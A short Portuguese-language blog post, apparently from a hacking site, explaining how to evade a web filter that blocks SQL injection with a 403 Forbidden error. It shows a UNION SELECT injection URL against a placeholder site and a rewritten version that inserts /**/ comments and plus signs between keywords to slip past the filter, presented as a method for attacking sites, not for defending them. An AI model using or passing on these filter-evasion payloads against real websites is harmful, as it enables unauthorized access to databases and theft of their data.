Injetando SQL Injection em Sites com Forbidden

 

Olá amigos,
A algum tempo foi lançando um filtro contra SQL Injection que parecia ser revolucionário.
Como nada é seguro o bastante hoje vamos falar como burla-lo.

Como ele Funciona?
Por exemplo, estamos no site: www.site.com/index.php?new=1 quando tentarmos injetar sql ele retornará o Acesso Proibido (Error 403).
www.site.com/index.php?new=1+union+all+select+1,2,3,4

Resulado:

1
2
3
4
5
Forbidden
 
You don't have permission to access /index.php on this server.
 
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

E agora? O que iremos fazer?
Simples, iremos utilizar este método, que me lembra muito XSS Hexadecimal.

 

O Método:
Apenas adicionar “/**/”"/**/” e “+” entre os espaços vagos.
Ex: www.site.com/index.php?new=1+union+all+select+1,2,3,4
Ficando: www.site.com/index.php?new=1+/**/union/**/+all+/**/select+/**/1,2,3,4

 

By: Lynn

Procurar no site

© 2010 - 2013 Todos os direitos reservados. Designed by: Evandro Wirlynthon